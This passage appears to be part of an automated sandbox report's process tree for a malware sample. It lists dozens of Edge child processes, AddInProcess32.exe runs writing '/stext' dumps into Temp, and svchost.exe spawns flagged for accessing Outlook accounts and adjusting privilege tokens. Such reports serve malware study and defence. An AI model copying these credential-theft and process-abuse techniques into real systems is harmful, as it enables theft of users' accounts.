        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10249842244878745743,12683305329395250409,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:1
        7⤵
        
        PID:5112
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10249842244878745743,12683305329395250409,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5464 /prefetch:1
        7⤵
        
        PID:1720
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10249842244878745743,12683305329395250409,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:1
        7⤵
        
        PID:1076
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10249842244878745743,12683305329395250409,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5256 /prefetch:1
        7⤵
        
        PID:4300
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10249842244878745743,12683305329395250409,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6112 /prefetch:1
        7⤵
        
        PID:5336
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10249842244878745743,12683305329395250409,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5576 /prefetch:1
        7⤵
        
        PID:5448
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10249842244878745743,12683305329395250409,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:1
        7⤵
        
        PID:5964
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10249842244878745743,12683305329395250409,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6048 /prefetch:1
        7⤵
        
        PID:5988
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10249842244878745743,12683305329395250409,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6384 /prefetch:1
        7⤵
        
        PID:64
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10249842244878745743,12683305329395250409,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5876 /prefetch:1
        7⤵
        
        PID:5272
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10249842244878745743,12683305329395250409,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:1
        7⤵
        
        PID:3576
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10249842244878745743,12683305329395250409,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6652 /prefetch:1
        7⤵
        
        PID:5588
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10249842244878745743,12683305329395250409,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4196 /prefetch:1
        7⤵
        
        PID:4104
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10249842244878745743,12683305329395250409,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6452 /prefetch:1
        7⤵
        
        PID:4276
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10249842244878745743,12683305329395250409,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7004 /prefetch:1
        7⤵
        
        PID:1124
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10249842244878745743,12683305329395250409,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7068 /prefetch:1
        7⤵
        
        PID:5520
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10249842244878745743,12683305329395250409,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6536 /prefetch:1
        7⤵
        
        PID:5820
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10249842244878745743,12683305329395250409,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6588 /prefetch:1
        7⤵
        
        PID:716
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10249842244878745743,12683305329395250409,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6324 /prefetch:1
        7⤵
        
        PID:4064
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10249842244878745743,12683305329395250409,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6188 /prefetch:1
        7⤵
        
        PID:6068
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10249842244878745743,12683305329395250409,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7504 /prefetch:1
        7⤵
        
        PID:4984
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10249842244878745743,12683305329395250409,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7672 /prefetch:1
        7⤵
        
        PID:4700
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,10249842244878745743,12683305329395250409,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=7732 /prefetch:2
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3168
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10249842244878745743,12683305329395250409,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7744 /prefetch:1
        7⤵
        
        PID:6028
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10249842244878745743,12683305329395250409,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7716 /prefetch:1
        7⤵
        
        PID:436
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:1132
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc0c8446f8,0x7ffc0c844708,0x7ffc0c844718
        7⤵
        
        PID:4612
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\rzlrxwoydgymxdiekznmgzcfufpsajwjz"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3636
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\ctqkqo"
        5⤵
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:4300
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\mvdcrhrtf"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:628
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3620
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:1648
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0x8c,0x108,0x7ffc0c8446f8,0x7ffc0c844708,0x7ffc0c844718
        7⤵
        
        PID:832
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:4164
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xb4,0x108,0x7ffc0c8446f8,0x7ffc0c844708,0x7ffc0c844718
        7⤵
        
        PID:3124
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3672
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:5268
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc0c8446f8,0x7ffc0c844708,0x7ffc0c844718
        7⤵
        
        PID:5280
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:5836
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc0c8446f8,0x7ffc0c844708,0x7ffc0c844718
        7⤵
        
        PID:5856
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5864
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:964
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc0c8446f8,0x7ffc0c844708,0x7ffc0c844718
        7⤵
        
        PID:1120
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:5940
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xd8,0x114,0x7ffc0c8446f8,0x7ffc0c844708,0x7ffc0c844718
        7⤵
        
        PID:5848
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:212
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:4512
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc0c8446f8,0x7ffc0c844708,0x7ffc0c844718
        7⤵
        
        PID:6104
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:5936
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc0c8446f8,0x7ffc0c844708,0x7ffc0c844718
        7⤵
        
        PID:1828
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3872
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:5096
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc0c8446f8,0x7ffc0c844708,0x7ffc0c844718
        7⤵
        
        PID:2724
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:1596
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x78,0x108,0x10c,0xe4,0x110,0x7ffc0c8446f8,0x7ffc0c844708,0x7ffc0c844718
        7⤵
        
        PID:5884
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5944
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:5180
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc0c8446f8,0x7ffc0c844708,0x7ffc0c844718
        7⤵
        
        PID:4284
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
